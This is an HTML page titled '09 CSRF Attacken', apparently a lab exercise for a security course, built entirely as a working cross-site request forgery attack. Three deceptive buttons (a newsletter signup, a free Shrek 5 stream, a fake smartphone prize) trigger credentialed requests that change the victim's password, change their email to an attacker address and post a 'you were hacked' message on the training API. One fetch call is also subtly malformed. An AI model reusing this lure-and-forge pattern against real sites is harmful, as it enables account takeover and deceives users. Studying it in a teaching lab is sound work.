<!DOCTYPE html>
<html lang='de'>
<head>
    <meta charset='UTF-8'>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
    <meta http-equiv='X-UA-Compatible' content='ie=edge'>
    <title>09 CSRF Attacken</title>
</head>
<body>
    <h2>CSRF-Attacken</h2>
    <br><br>
    <form>
        <h3>Newsletter abonnieren</h3><br>
        <input type='button' id='btnChangePassword' value='Jetzt den Newsletter abonnieren'>
    </form>

    <br><br><br>

    <form>
        <h3>Stream für den neuen Shrek Film</h3><br>
        <input type='button' id='btnChangeEmail' value='Jetzt Shrek 5 legal streamen'>
    </form>

    <br><br><br>

    <form>
        <h3>Sie sind der 1000. Besucher. Daher haben Sie ein neues Samsung Galaxy S10 gewonnen.</h3><br>
        <input type='button' id='btnPostBlogMsg' value='Hier klicken, um Ihren Gewinn abzuholen'>
    </form>

    <script>
        var changePassword = document.getElementById('btnChangePassword');    

        changePassword.addEventListener('click', async (event) => {   // btnChangePassword wurde gedrückt
            console.log("btnChangePassword was pressed")
            event.preventDefault();

            var data = new FormData();

            // Benutzernamen des Users abfragen
            data.append('username', await fetch('https://m183.gibz-informatik.ch/api/csrf/getUsername', {
                credentials: 'include'
            }.then(response => response.text)));

            // Neues Passwort anfügen
            data.append('password', 'Pa$$w0rd');

            // Daten mit Benutzernamen und neuem Passwort übermitteln und dadurch das Passwort ändern
            await fetch('https://m183.gibz-informatik.ch/api/csrf/changePassword', {
                method: 'POST',
                credentials: 'include',
                body: data,
                mode: 'cors'
            }).then(response => response.status + response.statusText);
        });


        var changeEmail = document.getElementById('btnChangeEmail');    

        changeEmail.addEventListener('click', async (event) => { // btnChangeEmail wurde gedrückt
            console.log("btnChangeEmail was pressed")
            event.preventDefault();    

            // POST-Aufruf um Email adresse zu ändern
            await fetch('https://m183.gibz-informatik.ch/api/csrf/changeEmail', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'content-type': 'application/json'
                },
                body: JSON.stringify({
                    email: 'pawnd@gibz.ch'
                }),
                mode: 'cors'
            }).then(response => response.status + response.statusText);
        });


        var postBlogMsg = document.getElementById('btnPostBlogMsg');    

        postBlogMsg.addEventListener('click', async (event) => { // btnPostBlogMsg wurde gedrückt
            console.log("btnPostBlogMsg was pressed")
            event.preventDefault();  

            // POST-Aufruf, um einen Blogbeitrag zu posten  
            await fetch('https://m183.gibz-informatik.ch/api/csrf/postMessage', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'content-type': 'application/json'
                },
                body: JSON.stringify({
                    message: 'Sie wurden gehackt :)'
                }),
                mode: 'cors'
            }).then(response => response.status + response.statusText);
        });
    </script>
</body>
</html>
